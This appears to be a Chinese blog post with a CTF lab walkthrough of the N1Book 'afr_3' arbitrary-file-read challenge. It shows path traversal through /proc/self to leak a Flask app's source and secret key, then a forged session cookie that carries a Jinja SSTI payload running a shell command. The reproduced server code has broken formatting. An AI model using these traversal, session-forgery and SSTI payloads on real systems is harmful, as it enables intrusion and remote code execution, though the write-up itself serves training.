【文件读取/包含】任意文件读取漏洞 afr_3

最新推荐文章于 2024-04-16 05:34:47 发布
最新推荐文章于 2024-04-16 05:34:47 发布
阅读量160 收藏
点赞数
分类专栏: 文件包含 文件读取 漏洞库 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134429897
版权

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_3
漏洞类型文件读取/包含
漏洞等级⭐⭐⭐⭐⭐
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.环境搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-3:latest
    ports:
      - 5000:5000
 

         2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 5000端口

 

搭建成功 

1.5深度利用

1.5.1靶机攻略

        1.查看源码

        没有发现有用东西

        2.扫描目录

         根据引导进入article,熟悉的参数出来了,name=aiticle

 3.尝试查看etc/passwd

查看flag

失败了

尝试使用php://fileter 读取

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件] 

也失败了。

看了大神的讲解,我觉得应该能想到,因为现在的信息就是已经可以正常包含/etc/目录下的文件(passwd),那么/proc/目录下的也应该能包含

/proc/
里面含有很多的进程信息,比如/proc/3333,就是进程ID为3333的信息

/proc/self/
这个就很魔幻了,因为进程ID是一直变得,我这里如果填了article=/proc/self/......,那么就是article相关的进程,也就是说这个self是谁用就是谁

cmdline
启动当前进程的完成命令


cwd
当前进程的工作目录

        访问,发现pythonserver.py,这里应该不是pythonserver.py文件,因为cmdline是启动当前进程的完成命令,那执行的命令应该是python server.py 

article?name=../../../../../../proc/self/cmdline

4.通过cwd读取server.py

article?name=../../../../../proc/self/cwd/server.py

 拿到server.py的源码

#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')#execfile() 函数可以用来执行一个文件。
execfile('key.py')
FLAG = flag
app.secret_key = key @ app.route("/n1page", methods=["GET", "POST"])


def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session[
    'n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template) @ app.route("/", methods=["GET"])


def index(): return render_template("main.html") @ app.route('/article', methods=['GET'])


def article(): error = 0


if 'name' in request.args:
    page = request.args.get('name') else:
    page = 'article'
if page.find('flag') >= 0: page = 'notallowed.txt'
try:
    template = open('/home/nu11111111l/articles/{}'.format(page)).read() except Exception as e:
    template = e
return render_template('article.html', template=template)
if __name__ == "__main__": app.run(host='0.0.0.0', debug=False)

 

代码中出现了,flag.py和key.py,分别包含一下这俩,在key.py中发现了一段关于key的代码

/article?name=../../../../../proc/self/cwd/flag.py
/article?name=../../../../../proc/self/cwd/key.py

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

伪造flask的session,秘钥为Drmhze6EPcv0fN_81Bj-nA

        下载脚本

git clone https://github.com/noraj/flask-session-cookie-manager 

        使用脚本编译 

 sudo python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

         拿到伪造flask的session

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.ZVTSxw.EZGsAPNdMs8G5kxefOpGvPQMXoM

5.使用BP,访问首页抓包

        修改session值为刚刚得到的

拿到flag

 flag = ‘n1book{afr_3_solved}’;

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
任意文件读取
admin的博客
05-13 32
一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,通过任意文件下载,可以下载服务器的任意文件web业务的代码,服务器和系统的具体配置信息,也可以下载的配置信息,以及对内网的信息探测等等。。
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1725
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8630
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
任意文件读取漏洞
m0_57276420的博客
04-08 5003
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
Web漏洞-任意文件读取漏洞
知世郎
09-01 323
原理:任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。一般任意文件读取漏洞可以读取配置信息甚至系统重要文件
AFR批量文件查找替换.zip
04-13
批量文本替换查找很不错的 AFR文件查找替换 AFR批量查找替换
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,...AFR_FSDK_FaceInput public struct AFR_FSDK_FaceInput { public MRECT rcFace; public int lOrient; } 这个结构体是FD识别的输出结构体,我们在上一章节标记人脸时使用了此结构体。
AFR的KeyGen文件
03-22
Advanced find and replace 7.X 的 注册码 生成工具,不是强破。
File Read| file-read| 任意文件读取
薛定谔嘚喵博客
05-05 721
任意文件读取的危害往往大于目录遍历漏洞任意文件读取不仅会泄露网站的结构目录,一些敏感文件还会被通过构造特殊的字符结构下载下来,比如说…任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
[任意文件上传、包含读取]
个人学习参考
03-09 884
本篇文章仅作为本人学习笔记文件上传是Web 应用的必备功能之一,比如上传头像、上传附件共享⽂件等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 3719
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
文件操作安全之-文件读取原理篇
村中少年的专栏
10-31 988
文件读取的定义,文件读取漏洞原理,文件读取漏洞的具体案例,例如Jenkins CVE-2018-1999002 和gitlab CVE-2016-9086文件解析漏洞,以及文件读取漏洞潜在的危害阐述文件读取漏洞中的安全问题。
任意文件读取 下载漏洞总结_任意文件下载漏洞,2024年最新网络安全工程师面试题
最新发布
m0_60226911的博客
04-16 678
当我们不知道路径是什么的情况下,这个可以说是一个核武器了,我们利用任意文件下载漏洞将mlocate.db文件下载下来,利用locate命令将数据输出成文件,这里面包含了全部的文件路径信息。然后逐个下载我们需要审计的代码文件,但是下载的时候变得很繁琐,我们只能尝试去猜解目录,然后下载一些中间件的记录日志进行分析。总体来说,任意文件下载漏洞的利用主要是为了信息收集,我们通过对服务器配置文件的下载,获取到大量的配置信息、源码,从而根据获取的信息来进一步挖掘服务器漏洞从而入侵。因为权限决定我们能下载的文件范围。
【MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3555
任意文件读取漏洞分析
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值